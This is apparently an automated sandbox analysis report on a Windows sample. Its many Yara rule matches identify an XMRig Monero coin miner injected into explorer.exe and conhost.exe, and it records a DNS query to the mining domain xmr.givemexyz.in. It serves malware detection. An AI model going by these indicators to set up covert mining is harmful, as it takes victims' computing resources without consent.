Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr, String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: conhost.exe, 00000001.00000002.685200138.0000025F60DC1000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, String found in binary or memory: https://xmrig.com/benchmark/%s
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, String found in binary or memory: https://xmrig.com/docs/algorithms
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, String found in binary or memory: https://xmrig.com/wizard
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown, DNS traffic detected: queries for: xmr.givemexyz.in

System Summary:

Malicious sample detected (through community Yara rule)
Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
